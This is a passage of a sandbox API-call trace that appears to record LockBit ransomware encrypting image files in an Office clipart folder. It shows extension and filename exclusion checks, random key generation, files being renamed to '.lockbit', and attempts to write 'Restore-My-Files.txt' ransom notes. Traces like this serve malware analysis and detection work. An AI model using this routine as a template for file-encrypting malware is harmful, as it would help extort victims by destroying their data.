(pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG") returned=".JPG" [0161.431] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.431] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.431] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.431] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.431] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.431] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.431] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.431] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.431] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.431] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.432] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.432] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.432] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.432] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.432] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.432] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.432] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG.lockbit") returned 72 [0161.432] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387882.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.433] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.433] malloc (_Size=0x40068) returned 0x3df0008 [0161.433] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=39148) returned 1 [0161.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.434] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.434] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.439] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.439] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.439] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.442] free (_Block=0x1fa2ed8) [0161.442] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.442] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.442] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.443] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x7df3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0387895.JPG", cAlternateFileName="")) returned 1 [0161.443] lstrcmpiW (lpString1=".", lpString2="J0387895.JPG") returned -1 [0161.443] lstrcmpiW (lpString1="..", lpString2="J0387895.JPG") returned -1 [0161.443] PathFindExtensionW (pszPath="J0387895.JPG") returned=".JPG" [0161.443] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.443] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.443] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.443] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.443] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.443] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.443] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.443] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.443] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.443] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.444] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.444] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0387895.JPG") returned 1 [0161.445] lstrcmpiW (lpString1="ntldr", lpString2="J0387895.JPG") returned 1 [0161.445] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0387895.JPG") returned 1 [0161.445] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0387895.JPG") returned -1 [0161.445] lstrcmpiW (lpString1="autorun.inf", lpString2="J0387895.JPG") returned -1 [0161.445] lstrcmpiW (lpString1="thumbs.db", lpString2="J0387895.JPG") returned 1 [0161.445] lstrcmpiW (lpString1="iconcache.db", lpString2="J0387895.JPG") returned -1 [0161.445] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.445] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG") returned=".JPG" [0161.445] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.445] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.445] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.445] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.445] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.445] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.445] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.446] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.446] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG.lockbit") returned 72 [0161.446] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387895.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.448] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.448] malloc (_Size=0x40068) returned 0x3df0008 [0161.448] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32243) returned 1 [0161.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.449] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.454] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.454] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.454] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.457] free (_Block=0x1fa2ed8) [0161.457] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.457] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.457] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.457] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59a43300, ftCreationTime.dwHighDateTime=0x1c97bb5, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x59a43300, ftLastWriteTime.dwHighDateTime=0x1c97bb5, nFileSizeHigh=0x0, nFileSizeLow=0x351c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0390072.JPG", cAlternateFileName="")) returned 1 [0161.457] lstrcmpiW (lpString1=".", lpString2="J0390072.JPG") returned -1 [0161.457] lstrcmpiW (lpString1="..", lpString2="J0390072.JPG") returned -1 [0161.457] PathFindExtensionW (pszPath="J0390072.JPG") returned=".JPG" [0161.457] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.457] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.457] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.457] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.457] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.457] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.457] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.457] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.458] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.458] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.459] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.459] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.459] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.459] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.459] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.459] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0390072.JPG") returned 1 [0161.459] lstrcmpiW (lpString1="ntldr", lpString2="J0390072.JPG") returned 1 [0161.459] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0390072.JPG") returned 1 [0161.459] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0390072.JPG") returned -1 [0161.459] lstrcmpiW (lpString1="autorun.inf", lpString2="J0390072.JPG") returned -1 [0161.459] lstrcmpiW (lpString1="thumbs.db", lpString2="J0390072.JPG") returned 1 [0161.459] lstrcmpiW (lpString1="iconcache.db", lpString2="J0390072.JPG") returned -1 [0161.459] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.459] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG") returned=".JPG" [0161.459] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.459] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.459] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.459] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.460] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.460] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.460] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG.lockbit") returned 72 [0161.460] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0390072.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.462] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.462] malloc (_Size=0x40068) returned 0x3df0008 [0161.462] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13596) returned 1 [0161.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.462] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.463] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.473] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.473] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.473] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.475] free (_Block=0x1fa2ed8) [0161.475] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.475] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.475] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.475] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55f55f00, ftCreationTime.dwHighDateTime=0x1c98cd0, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x55f55f00, ftLastWriteTime.dwHighDateTime=0x1c98cd0, nFileSizeHigh=0x0, nFileSizeLow=0x31883, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0400001.PNG", cAlternateFileName="")) returned 1 [0161.475] lstrcmpiW (lpString1=".", lpString2="J0400001.PNG") returned -1 [0161.475] lstrcmpiW (lpString1="..", lpString2="J0400001.PNG") returned -1 [0161.475] PathFindExtensionW (pszPath="J0400001.PNG") returned=".PNG" [0161.475] lstrcmpiW (lpString1=".386", lpString2=".PNG") returned -1 [0161.475] lstrcmpiW (lpString1=".cmd", lpString2=".PNG") returned -1 [0161.475] lstrcmpiW (lpString1=".exe", lpString2=".PNG") returned -1 [0161.476] lstrcmpiW (lpString1=".ani", lpString2=".PNG") returned -1 [0161.476] 